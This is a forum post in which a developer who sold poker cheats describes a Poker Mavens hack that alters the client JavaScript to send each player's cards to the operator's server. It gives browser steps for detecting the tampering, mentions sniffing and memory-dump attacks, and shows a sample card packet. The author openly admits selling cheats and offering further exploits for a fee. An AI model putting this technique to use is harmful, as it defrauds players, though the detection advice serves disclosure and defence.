Hello,
Allow me to introduce myself, although this is an unfortunate event, to provide some authenticity: I am a young developer who've had a history in developing (and reverse engineering) software, games, and auto-traders (for the forex/crypto market). (you can search up some of my other forum posts and sales on Google via my username, as this is not a self-advertising post, rather informative)
Some small context I would have to state is that the person was dealt a trial version of the patched Poker Mavens cheat, he never obtained the full cheat as he did not finish his payments. I'm assuming he went online searching for people to sell this cheat to fund his own (while making money I see), as the $10k price tag was indeed above the limits for a simple card showing trick.
Although I do understand your concern, do note that I was able to get that price tag from the following post:
Please note that I am the one from Lebanon, I am not sure of what his nationality is, or whether he is from the same country or not, I do hope it was not identity theft as stated in my email.
These words are indeed real and accurate, and I could not have said better otherwise. I will explain the hack provided and used by fellows among the community and ways to detect the cheating.
Although this may or may not be possible (subject for research), the person who had access to my trial version of the cheat was not able to do so (the reason is going to be stated below). Unless he was able to obtain a different cheat from elsewhere, I highly doubt clientside users can access such data beforehand. I did tell him I would try to exploit it for an extra fee, though.
Now that certain things are cleared, I'd like to explain how to detect the vulnerability from the cheat (in case he had resold it to someone else) as he had violated the code of conduct that is supposed to be respected by both parties.
Before I do so, I'd like to state that Poker Mavens is indeed secure, it was not as easy as other poker software I've gone through, hence went with a different approach, this one required me to reverse engineer the javascript code on the client-side to make a user send the content to someone else.
In other words, what the hack does is change the code on each person opening Poker Mavens' browser page, like somewhat a 'spyware' in English, that checks what cards you received, then sends them to my server.
After listening to PFA's radio, I've seen that Dan stated that Kent did not provide a way to know whether the webserver is infected as a client, although his quotation above does, but not in a visible matter.
First, press Ctrl+Shift+I on Google Chrome, which will bring up the developer console. Press Sources, and select the javascript file of which contains the PokerMinJs javascript code.
Press Ctrl+F to search, and type in 'ajax', this is served to POST/GET content to the server, note that other cheats may use a different method of intercepting and posting methods, but that was in my case.
If you can find any $.ajax inside the code, do NOT play on that poker site, as it sends data to the owner on the hand of cards you own.
Please note that PokerMavens is still on the safer end of other poker software out there, and fortunately, most cheats relating to that software is discoverable by the client. I am not saying it is entirely secure as such a thing does not exist, yet it is on the safer side.
As Kent had stated, if the owner wants to cheat his clients, he WILL find a way to do so, please do not trust any poker website by its software (even those who are using very expensive software, some were easier to hack than PM itself). I respect this guy's code and ethics on not providing the card showing feature upon a client's request. (By making a good reputation out of his software and himself, and more work to fellow cheat developers like me-- just kidding). Any exposed cheat of mine that goes to ruin the reputation of the software/game will get exposed for fixing as I do not intend to destroy any persons' business on the bricks of building my own.
I'd also like to state that this is not the only way to expose cheats as lots of clients do not load the JS code in such a way, ALL poker software is vulnerable to packet sniffing and memory dump attacks. Some are more secure than others, but the concept is still the same. In the most extreme cases, you can send a replica of your screen to the attacker, making the superuser see what you can see on the table. (this works on almost all online web-based software)
In PM's case, the data was very well secured from packet intercepting as well, making my job slightly harder:
It does seem he had taken extra precaution on the sniffers, you can always decrypt it with the provided salt, but you'll not be able to intercept them mid-session as it uses the WebSocket's Seed as another key. (which makes packet sniffers less effective in Poker Mavens)Command: "ECards"
Table: "Ring Game #01"
Type: "R"
Salt: "02B18FA165BF3C2F"
Hand: "22-1"
Card1: "2C"
Card2: "98"
Card3: "64"
Card4: "0A"
Card5: "9A"
Show: "No"
How could Kent fix this? Several ways, one of the common ways is to double-check the JS file's hash before posting it on the server; another would check the hash of the whole program to prevent its tampering. But I deem this as useless because a hacker will always find a way to hack in ANY ways possible. I suggest only playing poker in trusted real-life casinos, and not through the screen of your computer unless you completely trust the person hosting.
Do not hesitate to ask any questions regarding this or any other related topic.
Stay safe!